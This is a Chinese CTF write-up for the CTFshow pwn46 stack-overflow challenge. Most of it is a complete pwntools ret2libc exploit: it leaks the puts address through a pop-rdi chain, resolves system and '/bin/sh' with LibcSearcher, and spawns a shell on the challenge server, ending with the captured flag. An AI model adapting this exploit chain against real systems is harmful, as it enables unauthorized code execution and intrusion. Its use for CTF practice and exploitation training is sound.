CTFshow-PWN-栈溢出(pwn46)

原创 已于 2025-06-09 00:04:07 修改 · 210 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #PWN #栈溢出 #c语言 #CTF #ctfshow #ret2libc

于 2025-06-09 00:01:46 首次发布

无 system 无 /bin/sh

跟进 ctfshow 存在栈溢出

思路很清晰,最简单的方法:

用 puts 函数泄露 puts 函数的真实地址,打 ret2libc

偏移 120

废话不多说直接写 exp:

# @author:My6n
# @time:20250608
from pwn import *
from LibcSearcher import *
context(arch = 'amd64',os = 'linux',log_level = 'debug')
#io = process('./pwn')
io = remote('pwn.challenge.ctf.show',28120)
elf = ELF('./pwn')

offset = 120
puts_plt_addr = elf.plt['puts']
puts_got_addr = elf.got['puts']
ctfshow_addr = elf.symbols['ctfshow']
pop_rdi = 0x400803
ret_addr = 0x4004fe

payload1 = flat(cyclic(offset),pop_rdi,puts_got_addr,puts_plt_addr,ctfshow_addr)

io.sendline(payload1)

puts_addr = u64(io.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
print(hex(puts_addr))

libc = LibcSearcher('puts',puts_addr)
libc_base = puts_addr - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
bin_sh_addr = libc_base + libc.dump('str_bin_sh')

payload2 = flat(cyclic(offset),pop_rdi,bin_sh_addr,ret_addr,system_addr)
io.sendline(payload2)
io.interactive()

拿到 flag:ctfshow{d495bd39-34c0-49a5-bbfa-e0468786ccdb}

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

My6n

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值